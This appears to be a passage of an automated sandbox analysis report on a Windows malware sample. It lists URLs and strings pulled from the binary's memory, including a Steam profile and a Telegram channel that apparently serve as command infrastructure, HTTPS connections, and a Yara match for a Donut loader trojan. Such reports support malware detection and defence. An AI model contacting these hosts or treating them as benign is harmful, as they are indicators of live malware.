          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drString found in binary or memory: https://steamcommunity.com/profiles/76561199619938930/badges
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drString found in binary or memory: https://steamcommunity.com/profiles/76561199619938930/inventory/
          Source: 0x001900000002ab40-59.exe, 00000001.00000002.1724281527.00000000059FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199619938930dll
          Source: 0x001900000002ab40-59.exe, 00000001.00000002.1724281527.00000000059FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199619938930e
          Source: 0x001900000002ab40-59.exe, 00000001.00000002.1724281527.00000000059FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199619938930e7
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drString found in binary or memory: https://steamcommunity.com/workshop/
          Source: 0x001900000002ab40-59.exeString found in binary or memory: https://storage.ape.yandex.net/get/browser/install
          Source: 0x001900000002ab40-59.exeString found in binary or memory: https://storage.ape.yandex.net/get/browser/install?ui=&result=cancelled&time=&download_time=&install
          Source: 76561199619938930[1].htm.1.drString found in binary or memory: https://store.steampowered.com/
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633024645.0000000005A79000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A4D000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
          Source: 76561199619938930[1].htm.1.drString found in binary or memory: https://store.steampowered.com/about/
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drString found in binary or memory: https://store.steampowered.com/explore/
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drString found in binary or memory: https://store.steampowered.com/legal/
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drString found in binary or memory: https://store.steampowered.com/mobile
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drString found in binary or memory: https://store.steampowered.com/news/
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drString found in binary or memory: https://store.steampowered.com/points/shop/
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drString found in binary or memory: https://store.steampowered.com/privacy_agreement/
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drString found in binary or memory: https://store.steampowered.com/stats/
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drString found in binary or memory: https://store.steampowered.com/steam_refunds/
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
          Source: 0x001900000002ab40-59.exe, 0x001900000002ab40-59.exe, 00000001.00000002.1724191152.0000000005940000.00000040.00001000.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000002.1724819264.0000000005E30000.00000004.00001000.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000002.1725040619.0000000007676000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://t.me/asdfghjrrewqqqqtfg
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1712081694.0000000008357000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1712269375.000000000835A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15e498ec2b39921665a1fbc954bff40a8106629178eadc64
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1670010491.0000000008324000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
          Source: 0x001900000002ab40-59.exeString found in binary or memory: https://www.globalsign.com/repository/0
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633024645.0000000005A79000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A4D000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1670010491.0000000008324000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633024645.0000000005A79000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A4D000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633024645.0000000005A79000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A4D000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1712081694.0000000008357000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1712269375.000000000835A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.marriott.com/default.mi?utm_source=admarketplace&utm_medium=cpc&utm_campaign=Marriott_Pr
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633024645.0000000005A79000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A4D000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633024645.0000000005A79000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A4D000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
          Source: 0x001900000002ab40-59.exeString found in binary or memory: https://yandex.Arial(
          Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
          Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
          Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
          Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
          Source: unknownHTTPS traffic detected: 104.102.42.29:443 -> 192.168.2.10:49708 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49709 version: TLS 1.2

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 1.2.0x001900000002ab40-59.exe.5942544.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
          Source: 1.2.0x001900000002ab40-59.exe.5942544.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
          Source: 00000001.00000002.1724191152.0000000005940000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_059A0A87 NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,1_2_059A0A87
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008751901_2_00875190
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008755901_2_00875590
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008E76101_2_008E7610
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_0087C0C01_2_0087C0C0
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008CA0001_2_008CA000
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008E00701_2_008E0070
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008781D01_2_008781D0
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_0083C1701_2_0083C170
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008DE2001_2_008DE200
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_0090A2241_2_0090A224
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_0087E2401_2_0087E240
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008EE2601_2_008EE260
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008B22701_2_008B2270
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008CE3801_2_008CE380
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008B63B01_2_008B63B0
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008224C01_2_008224C0
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008F04401_2_008F0440
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008805B01_2_008805B0
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008825C01_2_008825C0
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008EE5D01_2_008EE5D0
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_009065FA1_2_009065FA
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008B65E01_2_008B65E0
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008D05F01_2_008D05F0
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008FE5701_2_008FE570
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008FA6801_2_008FA680
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_0086E6C01_2_0086E6C0
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008626F01_2_008626F0
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_0087C7901_2_0087C790
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008BA7901_2_008BA790
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008567C01_2_008567C0
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_0087E8A01_2_0087E8A0
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008F08A01_2_008F08A0
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008D08501_2_008D0850
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_009269DE1_2_009269DE
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008529601_2_00852960
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008F49701_2_008F4970
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_00824A801_2_00824A80
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_00844A901_2_00844A90
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_00822AB01_2_00822AB0
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_00878AD01_2_00878AD0
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008AAAF01_2_008AAAF0
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008D8AF01_2_008D8AF0
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_00850A001_2_00850A00
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_00930A001_2_00930A00
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_0092AA7A1_2_0092AA7A
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008E6B901_2_008E6B90
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008C8BE01_2_008C8BE0
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008F8B001_2_008F8B00
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008D6B201_2_008D6B20
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008A0B301_2_008A0B30
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_0086AB501_2_0086AB50
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_00870C801_2_00870C80
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_0084EC901_2_0084EC90
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_0092ECB01_2_0092ECB0
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008FACB01_2_008FACB0
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008F8CC01_2_008F8CC0
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_00880C201_2_00880C20
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_00850C401_2_00850C40
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008D6C701_2_008D6C70
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008C8DE01_2_008C8DE0
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_0085ED701_2_0085ED70
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008E8E201_2_008E8E20
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008D2E301_2_008D2E30
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_0089CE401_2_0089CE40
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_00822E571_2_00822E57
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_0087CE601_2_0087CE60
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008CEE601_2_008CEE60
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_00928E621_2_00928E62
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_0085CFF01_2_0085CFF0
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_0083CF101_2_0083CF10
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008D6F501_2_008D6F50
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008F10801_2_008F1080
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008E70D01_2_008E70D0
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008F70001_2_008F7000
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008A10101_2_008A1010
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008C90301_2_008C9030
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_0083F0401_2_0083F040
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008D10701_2_008D1070
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008431C01_2_008431C0
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008D71C01_2_008D71C0
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008D11101_2_008D1110
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_0085B1301_2_0085B130
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008A91401_2_008A9140
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008551701_2_00855170
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008812901_2_00881290
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008B12C01_2_008B12C0
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008EB2C01_2_008EB2C0
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008FD2501_2_008FD250
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_0084B3B01_2_0084B3B0
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008753C01_2_008753C0
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008C93E01_2_008C93E0
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008F13E01_2_008F13E0
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008FB3101_2_008FB310
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_0085F3601_2_0085F360
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008654801_2_00865480
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008C94901_2_008C9490
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008EF4A01_2_008EF4A0
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_0087D5301_2_0087D530
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008215401_2_00821540
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008755401_2_00875540
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008695501_2_00869550
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008A56801_2_008A5680
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008AF6901_2_008AF690
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_0088B6A01_2_0088B6A0
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008F16001_2_008F1600
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008736701_2_00873670
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_0083F7B01_2_0083F7B0
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008ED7D01_2_008ED7D0
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_009098A01_2_009098A0
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008218B01_2_008218B0
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008538C01_2_008538C0
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_0087F8D01_2_0087F8D0
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008E58F01_2_008E58F0
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008618601_2_00861860
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008699A01_2_008699A0
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_0088D9A01_2_0088D9A0
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008E39B01_2_008E39B0
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008219E01_2_008219E0
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_0087B9F01_2_0087B9F0
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008819001_2_00881900
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008F19301_2_008F1930
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_009059691_2_00905969
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_00825A801_2_00825A80
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_00875A801_2_00875A80
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_0089DA801_2_0089DA80
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_00907ACA1_2_00907ACA
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008CBAF01_2_008CBAF0
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_00821B901_2_00821B90
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008E7BD01_2_008E7BD0
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_00823B001_2_00823B00
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_0083DB201_2_0083DB20
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_00853B601_2_00853B60
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_00853C801_2_00853C80
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_0085FCC01_2_0085FCC0
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_0087DC001_2_0087DC00
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008A9C701_2_008A9C70
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008EBDC01_2_008EBDC0
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_00901DE01_2_00901DE0
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_00837D201_2_00837D20
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_00843D201_2_00843D20
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_00849E901_2_00849E90
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008F9ED01_2_008F9ED0
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008B7EF01_2_008B7EF0
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_00873E301_2_00873E30
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008EDE401_2_008EDE40
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008F3E601_2_008F3E60
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_00873F801_2_00873F80
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008ADF801_2_008ADF80
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_0084DFA01_2_0084DFA0
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_0089BFB01_2_0089BFB0
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_0087FF401_2_0087FF40
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008DBF401_2_008DBF40
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_00881F601_2_00881F60
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_0594049B1_2_0594049B
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_059A0A871_2_059A0A87
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_059625B41_2_059625B4
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_059464501_2_05946450
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_0596C7C81_2_0596C7C8
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_0594469A1_2_0594469A
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_059400001_2_05940000
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_0597C3B21_2_0597C3B2
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_0596A2A41_2_0596A2A4
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_059442261_2_05944226
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_059682741_2_05968274
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_05942D681_2_05942D68
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_0595510A1_2_0595510A
